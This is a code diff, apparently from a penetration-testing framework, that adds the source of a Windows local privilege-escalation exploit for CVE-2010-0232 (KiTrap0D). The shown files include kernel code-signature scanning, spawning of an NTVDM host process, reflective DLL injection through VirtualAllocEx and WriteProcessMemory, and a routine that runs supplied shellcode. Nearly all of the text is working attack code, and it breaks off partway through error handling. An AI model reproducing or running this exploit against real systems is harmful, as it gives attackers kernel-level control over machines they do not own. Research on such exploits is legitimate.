+{
+	return _rotr( d, HASH_KEY );
+}
+
+__forceinline DWORD _hash( char * c )
+{
+    register DWORD h = 0;
+	do
+	{
+		h = ror( h );
+        h += *c;
+	} while( *++c );
+
+    return h;
+}
+//===============================================================================================//
+typedef struct _UNICODE_STR
+{
+  USHORT Length;
+  USHORT MaximumLength;
+  PWSTR pBuffer;
+} UNICODE_STR, *PUNICODE_STR;
+
+// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
+//__declspec( align(8) ) 
+typedef struct _LDR_DATA_TABLE_ENTRY
+{
+	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STR FullDllName;
+	UNICODE_STR BaseDllName;
+	ULONG Flags;
+	SHORT LoadCount;
+	SHORT TlsIndex;
+	LIST_ENTRY HashTableEntry;
+	ULONG TimeDateStamp;
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
+// WinDbg> dt -v ntdll!_PEB_LDR_DATA
+typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
+{
+   DWORD dwLength;
+   DWORD dwInitialized;
+   LPVOID lpSsHandle;
+   LIST_ENTRY InLoadOrderModuleList;
+   LIST_ENTRY InMemoryOrderModuleList;
+   LIST_ENTRY InInitializationOrderModuleList;
+   LPVOID lpEntryInProgress;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
+typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
+{
+   struct _PEB_FREE_BLOCK * pNext;
+   DWORD dwSize;
+} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
+
+// struct _PEB is defined in Winternl.h but it is incomplete
+// WinDbg> dt -v ntdll!_PEB
+typedef struct __PEB // 65 elements, 0x210 bytes
+{
+   BYTE bInheritedAddressSpace;
+   BYTE bReadImageFileExecOptions;
+   BYTE bBeingDebugged;
+   BYTE bSpareBool;
+   LPVOID lpMutant;
+   LPVOID lpImageBaseAddress;
+   PPEB_LDR_DATA pLdr;
+   LPVOID lpProcessParameters;
+   LPVOID lpSubSystemData;
+   LPVOID lpProcessHeap;
+   PRTL_CRITICAL_SECTION pFastPebLock;
+   LPVOID lpFastPebLockRoutine;
+   LPVOID lpFastPebUnlockRoutine;
+   DWORD dwEnvironmentUpdateCount;
+   LPVOID lpKernelCallbackTable;
+   DWORD dwSystemReserved;
+   DWORD dwAtlThunkSListPtr32;
+   PPEB_FREE_BLOCK pFreeList;
+   DWORD dwTlsExpansionCounter;
+   LPVOID lpTlsBitmap;
+   DWORD dwTlsBitmapBits[2];
+   LPVOID lpReadOnlySharedMemoryBase;
+   LPVOID lpReadOnlySharedMemoryHeap;
+   LPVOID lpReadOnlyStaticServerData;
+   LPVOID lpAnsiCodePageData;
+   LPVOID lpOemCodePageData;
+   LPVOID lpUnicodeCaseTableData;
+   DWORD dwNumberOfProcessors;
+   DWORD dwNtGlobalFlag;
+   LARGE_INTEGER liCriticalSectionTimeout;
+   DWORD dwHeapSegmentReserve;
+   DWORD dwHeapSegmentCommit;
+   DWORD dwHeapDeCommitTotalFreeThreshold;
+   DWORD dwHeapDeCommitFreeBlockThreshold;
+   DWORD dwNumberOfHeaps;
+   DWORD dwMaximumNumberOfHeaps;
+   LPVOID lpProcessHeaps;
+   LPVOID lpGdiSharedHandleTable;
+   LPVOID lpProcessStarterHelper;
+   DWORD dwGdiDCAttributeList;
+   LPVOID lpLoaderLock;
+   DWORD dwOSMajorVersion;
+   DWORD dwOSMinorVersion;
+   WORD wOSBuildNumber;
+   WORD wOSCSDVersion;
+   DWORD dwOSPlatformId;
+   DWORD dwImageSubsystem;
+   DWORD dwImageSubsystemMajorVersion;
+   DWORD dwImageSubsystemMinorVersion;
+   DWORD dwImageProcessAffinityMask;
+   DWORD dwGdiHandleBuffer[34];
+   LPVOID lpPostProcessInitRoutine;
+   LPVOID lpTlsExpansionBitmap;
+   DWORD dwTlsExpansionBitmapBits[32];
+   DWORD dwSessionId;
+   ULARGE_INTEGER liAppCompatFlags;
+   ULARGE_INTEGER liAppCompatFlagsUser;
+   LPVOID lppShimData;
+   LPVOID lpAppCompatInfo;
+   UNICODE_STR usCSDVersion;
+   LPVOID lpActivationContextData;
+   LPVOID lpProcessAssemblyStorageMap;
+   LPVOID lpSystemDefaultActivationContextData;
+   LPVOID lpSystemAssemblyStorageMap;
+   DWORD dwMinimumStackCommit;
+} _PEB, * _PPEB;
+
+typedef struct
+{
+	WORD	offset:12;
+	WORD	type:4;
+} IMAGE_RELOC, *PIMAGE_RELOC;
+//===============================================================================================//
+#endif
+//===============================================================================================//

external/source/exploits/CVE-2010-0232/common/ResourceLoader.c

@@ -0,0 +1,89 @@
+/*!
+ * @file ResourceLoader.c
+ * @brief Helper functions for loading embedded resources.
+ */
+#include <Windows.h>
+#include "common.h"
+
+/*!
+ * @brief Load a resource from the given module as a raw array of bytes.
+ * @param hModule Handle to the module containing the resource.
+ * @param uResourceId ID of the resource to load.
+ * @param lpType The type of resource being loaded.
+ * @param pBuffer Pointer to the buffer that will receive the loaded resource.
+ * @param pBufferSize Pointer to the variable that will receive the size of \c pBuffer.
+ * @returns Indication of success or failure.
+ */
+DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize)
+{
+	DWORD dwResult = FALSE;
+	DWORD dwResourceSize = 0;
+	LPBYTE pResource = NULL;
+	HRSRC hResource = NULL;
+	HGLOBAL hResData = NULL;
+	LPVOID lpResData = NULL;
+
+	*pBuffer = NULL;
+	*pBufferSize = 0;
+
+	do
+	{
+		if ((hResource = FindResourceA(hModule, MAKEINTRESOURCEA(uResourceId), lpType)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to find resource %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((dwResourceSize = SizeofResource(hModule, hResource)) == 0) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to find resource size for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((pResource = (LPBYTE)malloc(dwResourceSize)) == NULL) {
+			dwResult = ERROR_NOT_ENOUGH_MEMORY;
+			dprintf("[RES] Unable to allocate memory for resource %d type %s size %u", uResourceId, lpType, dwResourceSize);
+			break;
+		}
+
+		if ((hResData = LoadResource(hModule, hResource)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to load resource for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		if ((lpResData = LockResource(hResData)) == NULL) {
+			dwResult = GetLastError();
+			dprintf("[RES] Unable to lock resource for %d type %s", uResourceId, lpType);
+			break;
+		}
+
+		memcpy_s(pResource, dwResourceSize, lpResData, dwResourceSize);
+
+		// Locked resource don't need to be unlocked. If we get here, we've won!
+		dwResult = ERROR_SUCCESS;
+		*pBuffer = lpResData;
+		*pBufferSize = dwResourceSize;
+
+	} while (0);
+
+	if (dwResult != ERROR_SUCCESS && pResource != NULL) {
+		free(pResource);
+	}
+
+	return dwResult;
+}
+
+/*!
+ * @brief Free up memory that was allocated when loading the resource.
+ * @param lpBuffer Pointer to the allocated buffer.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD resource_destroy(LPBYTE lpBuffer)
+{
+	if (lpBuffer != NULL)
+	{
+		free(lpBuffer);
+	}
+	return ERROR_SUCCESS;
+}

external/source/exploits/CVE-2010-0232/common/ResourceLoader.h

@@ -0,0 +1,11 @@
+/*!
+ * @file ResourceLoader.h
+ * @brief Declarations of helper functions for loading embedded resources.
+ */
+#ifndef _ESCALATE_RESOURCELOADER_H
+#define _ESCALATE_RESOURCELOADER_H
+
+DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize);
+DWORD resource_destroy(LPBYTE lpBuffer);
+
+#endif

external/source/exploits/CVE-2010-0232/common/common.h

@@ -0,0 +1,46 @@
+#ifndef _ESCALATE_COMMON_H
+#define _ESCALATE_COMMON_H
+
+/*! @brief When defined, debug output is enabled on Windows builds. */
+//#define DEBUGTRACE 1
+
+#ifdef DEBUGTRACE
+#include <stdio.h>
+#include <stdarg.h>
+#include <string.h>
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+#else
+#define dprintf(...) do{}while(0);
+#endif
+
+/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
+#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to `error`, prints debug output, then `break;` */
+#define BREAK_WITH_ERROR( str, err ) { dwResult = err; dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to the return value of `WASGetLastError()`, prints debug output, then does `break;` */
+#define BREAK_ON_WSAERROR( str ) { dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `continue;` */
+#define CONTINUE_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); continue; }
+
+/*! @brief Close a service handle if not already closed and set the handle to NULL. */
+#define CLOSE_SERVICE_HANDLE( h )  if( h ) { CloseServiceHandle( h ); h = NULL; }
+/*! @brief Close a handle if not already closed and set the handle to NULL. */
+#define CLOSE_HANDLE( h )          if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
+
+#ifdef DEBUGTRACE
+/*!
+ * @brief Output a debug string to the debug console.
+ * @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
+ *          using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
+ */
+static void real_dprintf(char *format, ...) {
+	va_list args;
+	char buffer[1024];
+	va_start(args,format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
+#endif
+
+#endif

external/source/exploits/CVE-2010-0232/kitrap0d.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d", "kitrap0d\kitrap0d.vcxproj", "{6B678096-E18A-427A-A8A3-C268AD2E12B8}"
+	ProjectSection(ProjectDependencies) = postProject
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D} = {DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}
+	EndProjectSection
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d_payload", "kitrap0d_payload\kitrap0d_payload.vcxproj", "{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.ActiveCfg = Debug|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.Build.0 = Debug|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.ActiveCfg = Release|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.Build.0 = Release|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.ActiveCfg = Debug|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.Build.0 = Debug|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.ActiveCfg = Release|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c

@@ -0,0 +1,497 @@
+/*!
+ * @file kitrap0d.c
+ * @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
+ * @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
+ * @remark Known Bugs:
+ *          - Windows NT4 fails to map the NULL page, (exit code 'NTAV').
+ *          - Windows 2000 fails to find the VDM_TIB size (something else is wrong)
+ *          - Windows 2008 Storage Server has 16-bit applications disabled by default
+ *          - Windows 2008 Storage Server is also missing twunk_16.exe, has debug.exe
+ */
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../common/ReflectiveLoader.c"
+
+#include <stdio.h>
+#include "../common/common.h"
+#include "../common/LoadLibraryR.h"
+#include "../common/ResourceLoader.h"
+#include "resource.h"
+
+#define PAGE_SIZE 0x1000
+
+enum { SystemModuleInformation = 11 };
+
+typedef struct
+{
+	ULONG   Unknown1;
+	ULONG   Unknown2;
+	PVOID   Base;
+	ULONG   Size;
+	ULONG   Flags;
+	USHORT  Index;
+	USHORT  NameLength;
+	USHORT  LoadCount;
+	USHORT  PathLength;
+	CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
+
+typedef struct
+{
+	ULONG   Count;
+	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+typedef struct CodeSignature
+{
+	UCHAR Signature[16];
+	DWORD Version;
+};
+
+/*!
+ * @brief List of code signatures used when searching kernel memory.
+ * @remark These are generated using kd -kl -c 'db nt!Ki386BiosCallReturnAddress;q'
+ */
+struct CodeSignature CodeSignatures[] = {
+	{ "\x64\xA1\x1C\x00\x00\x00\x5A\x89\x50\x04\x8B\x88\x24\x01\x00\x00", 0 }, // Windows NT4
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 1 }, // Windows 2000
+	{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
+	{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7
+	{ "", -1 }
+};
+
+/*!
+ * @brief Scan the appropriate kernel image for the correct offset.
+ * @retval TRUE An offset was found.
+ * @retval FALSE An offset was not found.
+ */
+BOOL kitrap0d_scan_kernel(PDWORD KernelBase, PDWORD OffsetFromBase)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC NtQuerySystemInformation = NULL;
+	HMODULE hKernel = NULL;
+	HMODULE hNtdll = NULL;
+	PIMAGE_DOS_HEADER DosHeader = NULL;
+	PIMAGE_NT_HEADERS PeHeader = NULL;
+	PIMAGE_OPTIONAL_HEADER OptHeader = NULL;
+	PBYTE ImageBase = NULL;
+	HKEY MmHandle = NULL;
+	OSVERSIONINFO os = { 0 };
+	SYSTEM_MODULE_INFORMATION ModuleInfo = { 0 };
+	DWORD PhysicalAddressExtensions = 0;
+	DWORD DataSize = 0;
+	ULONG i = 0;
+	ULONG x = 0;
+
+	// List of versions we have code signatures for.
+	enum {
+		MICROSOFT_WINDOWS_NT4 = 0,
+		MICROSOFT_WINDOWS_2000 = 1,
+		MICROSOFT_WINDOWS_XP = 2,
+		MICROSOFT_WINDOWS_2003 = 3,
+		MICROSOFT_WINDOWS_VISTA = 4,
+		MICROSOFT_WINDOWS_2008 = 5,
+		MICROSOFT_WINDOWS_7 = 6,
+	} Version = MICROSOFT_WINDOWS_7;
+
+	do
+	{
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetModuleHandle ntdll failed", ERROR_INVALID_HANDLE);
+		}
+
+		// NtQuerySystemInformation can be used to find kernel base address
+		NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+		if (!NtQuerySystemInformation) {
+			BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetProcAddress NtQuerySystemInformation failed", ERROR_INVALID_HANDLE);
+		}
+
+		// Determine kernel version so that the correct code signature is used
+		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+		if (!GetVersionEx(&os)) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx() => %u.%u", os.dwMajorVersion, os.dwMinorVersion);
+
+		if (os.dwMajorVersion == 4 && os.dwMinorVersion == 0) {
+			Version = MICROSOFT_WINDOWS_NT4;
+		}
+		if (os.dwMajorVersion == 5) {
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_2000;
+			}
+			if (os.dwMinorVersion == 1) {
+				Version = MICROSOFT_WINDOWS_XP;
+			}
+			if (os.dwMinorVersion == 2) {
+				Version = MICROSOFT_WINDOWS_2003;
+			}
+		}
+		if (os.dwMajorVersion == 6) {
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_VISTA;
+			}
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_2008;
+			}
+			if (os.dwMinorVersion == 1) {
+				Version = MICROSOFT_WINDOWS_7;
+			}
+		}
+
+		// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address
+		NtQuerySystemInformation(SystemModuleInformation, &ModuleInfo, sizeof(ModuleInfo), NULL);
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. NtQuerySystemInformation() => %s@%p", ModuleInfo.Module[0].ImageName, ModuleInfo.Module[0].Base);
+
+		// Load the kernel image specified
+		hKernel = LoadLibrary(strrchr(ModuleInfo.Module[0].ImageName, '\\') + 1);
+		if (!hKernel) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. LoadLibrary failed");
+		}
+
+		// Parse image headers
+		*KernelBase = (DWORD)ModuleInfo.Module[0].Base;
+		ImageBase = (PBYTE)hKernel;
+		DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
+		PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
+		OptHeader = &PeHeader->OptionalHeader;
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. Searching for kernel %u.%u signature: version %d...", os.dwMajorVersion, os.dwMinorVersion, Version);
+
+		for (x = 0;; x++)
+		{
+			if (CodeSignatures[x].Version == -1) {
+				break;
+			}
+
+			if (CodeSignatures[x].Version != Version) {
+				continue;
+			}
+
+			dprintf("[KITRAP0D] kitrap0d_scan_kernel. Trying signature with index %d", x);
+
+			// Scan for the appropriate signature...
+			for (i = OptHeader->BaseOfCode; i < OptHeader->SizeOfCode; i++)
+			{
+				if (memcmp(&ImageBase[i], CodeSignatures[x].Signature, sizeof CodeSignatures[x].Signature) == 0)
+				{
+					dprintf("[KITRAP0D] kitrap0d_scan_kernel. Signature found %#x bytes from kernel base", i);
+
+					*OffsetFromBase = i;
+
+					FreeLibrary(hKernel);
+
+					return TRUE;
+				}
+			}
+		}
+
+	} while (0);
+
+	dprintf("[KITRAP0D] kitrap0d_scan_kernel. Code not found, the signatures need to be updated for this kernel");
+
+	if (hKernel) {
+		FreeLibrary(hKernel);
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Grab a useful Handle to NTVDM.
+ * @param cpProgram Path to the program to invoke.
+ * @param hProcess Pointer to the variable that will receive the process handle.
+ * @retval TRUE Handle acquisition succeeded.
+ * @retval TRUE Handle acquisition failed.
+ */
+BOOL kitrap0d_spawn_ntvdm(char * cpProgram, HANDLE * hProcess)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	PROCESS_INFORMATION pi = { 0 };
+	STARTUPINFO si = { 0 };
+	ULONG i = 0;
+
+	do
+	{
+		si.cb = sizeof(STARTUPINFO);
+
+		// Start the child process, which should invoke NTVDM...
+		if (!CreateProcess(cpProgram, cpProgram, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess(\"%s\") => %u", cpProgram, pi.dwProcessId);
+
+		// Get more access
+		*hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, pi.dwProcessId);
+		if (*hProcess == NULL)
+		{
+			TerminateProcess(pi.hProcess, 'SPWN');
+			CloseHandle(pi.hThread);
+			CloseHandle(pi.hProcess);
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess(%u) => %#x", pi.dwProcessId, *hProcess);
+
+		CloseHandle(pi.hThread);
+
+		CloseHandle(pi.hProcess);
+
+	} while (0);
+
+	if (dwResult == ERROR_SUCCESS) {
+		return TRUE;
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Find a suitable exe to host the exploit in.
+ * @param cpOutput Buffer that will contain the path to the executable which will
+ *                 host the exploit.
+ * @param dwOutputSize Size of the \c cpOutput buffer.
+ * @retval TRUE Found a valid exe to host the exploit in.
+ * @retval FALSE Unable to find a valid exe to host the exploit in.
+ */
+BOOL elevate_via_exploit_getpath( char *cpOutput, DWORD dwOutputSize )
+{
+	DWORD dwResult         = ERROR_SUCCESS;
+	char cWinDir[MAX_PATH] = {0};
+	DWORD dwIndex          = 0;
+	char * cpFiles[]       = {  "twunk_16.exe", 
+								"debug.exe", 
+								"system32\\debug.exe", 
+								NULL };
+
+	do
+	{
+		if( !GetWindowsDirectory( cWinDir, MAX_PATH ) )
+			BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_getpath. GetWindowsDirectory failed" );
+	
+		while( TRUE )
+		{
+			char * cpFileName = cpFiles[dwIndex];
+			if( !cpFileName )
+				break;
+
+			if ( _snprintf_s( cpOutput, dwOutputSize, dwOutputSize - 1, "%s%s%s", cWinDir,
+				 cWinDir[ strlen(cWinDir) - 1 ] == '\\' ? "" : "\\", cpFileName ) == -1 )
+			{
+				dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Path truncation: %s", cpOutput );
+				break;
+			}
+
+			dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Trying: %s", cpOutput );
+
+			if( GetFileAttributes( cpOutput ) != INVALID_FILE_ATTRIBUTES )
+				return TRUE;
+
+			memset( cpOutput, 0, dwOutputSize );
+
+			dwIndex++;
+		}
+
+	} while(0);
+
+	return FALSE;
+}
+
+/*!
+ * @brief Helper thread function which runs the given payload directly.
+ * @param lpPayload The payload shellcode to execute.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+	dprintf("[KITRAP0D] Payload thread started.");
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @breif Entry point for the KiTrap0D exploit.
+ * @remark This is known as CVE-2010-0232.
+ * @param hElevateModule Handle to the DLL which contains the kitrap0d_payload DLL.
+ * @param lpPayload Pointer to the shellcode to run on successful exploitation.
+ * @returns Indication of success or failure.
+ * @retval ERROR_SUCCESS The exploit worked as expected.
+ * @retval ERROR_NOT_SUPPORTED The exploit is not supported on this platform.
+ */
+DWORD elevate_via_exploit_kitrap0d(HMODULE hElevateModule, LPVOID lpPayload)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	HANDLE hVdm = NULL;
+	HANDLE hThread = NULL;
+	LPVOID lpServiceBuffer = NULL;
+	LPVOID lpRemoteCommandLine = NULL;
+	char cWinDir[MAX_PATH] = { 0 };
+	char cVdmPath[MAX_PATH] = { 0 };
+	char cCommandLine[MAX_PATH] = { 0 };
+	DWORD dwExitCode = 0;
+	DWORD dwKernelBase = 0;
+	DWORD dwOffset = 0;
+	DWORD dwServiceLength = 0;
+
+	do
+	{
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting with HMODULE %x ...", hElevateModule);
+
+		if (lpPayload == NULL) {
+			BREAK_WITH_ERROR("[KITRAP0D] payload argument not specified", ERROR_BAD_ARGUMENTS);
+		}
+
+		if (resource_extract_raw(hElevateModule, IDR_DLL_KITRAP0D, "DLL", (LPBYTE*)&lpServiceBuffer, &dwServiceLength) != ERROR_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
+		}
+
+		if (!dwServiceLength || !lpServiceBuffer) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
+		}
+
+		// 1. first get a file path to a suitable exe...
+		if (!elevate_via_exploit_getpath(cVdmPath, MAX_PATH)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. elevate_via_exploit_getpath failed", ERROR_FILE_NOT_FOUND);
+		}
+
+		// 2. Scan kernel image for the required code sequence, and find the base address...
+		if (!kitrap0d_scan_kernel(&dwKernelBase, &dwOffset)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_scanforcodesignature failed", ERROR_INVALID_HANDLE);
+		}
+
+		// 3. Invoke the NTVDM subsystem, by launching any MS-DOS executable...
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting the NTVDM subsystem by launching MS-DOS executable");
+
+		if (!kitrap0d_spawn_ntvdm(cVdmPath, &hVdm)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_spawn_ntvdm failed", ERROR_INVALID_HANDLE);
+		}
+
+		// 4. Use RDI to inject the elevator dll into the remote NTVDM process...
+		//    Passing in the parameters required by exploit thread via the LoadRemoteLibraryR inject technique.
+		_snprintf_s(cCommandLine, sizeof(cCommandLine), sizeof(cCommandLine), "/VDM_TARGET_PID:0x%08X /VDM_TARGET_KRN:0x%08X /VDM_TARGET_OFF:0x%08X\x00", GetCurrentProcessId(), dwKernelBase, dwOffset);
+
+		// alloc some space and write the commandline which we will pass to the injected dll...
+		lpRemoteCommandLine = VirtualAllocEx(hVdm, NULL, strlen(cCommandLine) + 1, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+
+		if (!lpRemoteCommandLine) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. VirtualAllocEx failed");
+		}
+
+		if (!WriteProcessMemory(hVdm, lpRemoteCommandLine, cCommandLine, strlen(cCommandLine) + 1, NULL)) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. WriteProcessMemory failed");
+		}
+
+		// inject the dll...
+		hThread = LoadRemoteLibraryR(hVdm, lpServiceBuffer, dwServiceLength, lpRemoteCommandLine);
+		if (!hThread) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. LoadRemoteLibraryR failed");
+		}
+
+		// 5. Wait for the thread to complete
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. WaitForSingleObject(%#x, INFINITE);", hThread);
+		WaitForSingleObject(hThread, INFINITE);
+
+		// pass some information back via the exit code to indicate what happened.
+		GetExitCodeThread(hThread, &dwExitCode);
+
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. GetExitCodeThread(%#x, %p); => %#x", hThread, &dwExitCode, dwExitCode);
+
+		switch (dwExitCode)
+		{
+		case 'VTIB':
+			// A data structure supplied to the kernel called VDM_TIB has to have a 'size' field that
+			// matches what the kernel expects.
+			// Try running `kd -kl -c 'uf nt!VdmpGetVdmTib;q'` and looking for the size comparison.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to find the size of the VDM_TIB structure", dwExitCode);
+		case 'NTAV':
+			// NtAllocateVirtualMemory() can usually be used to map the NULL page, which NtVdmControl()
+			// expects to be present.
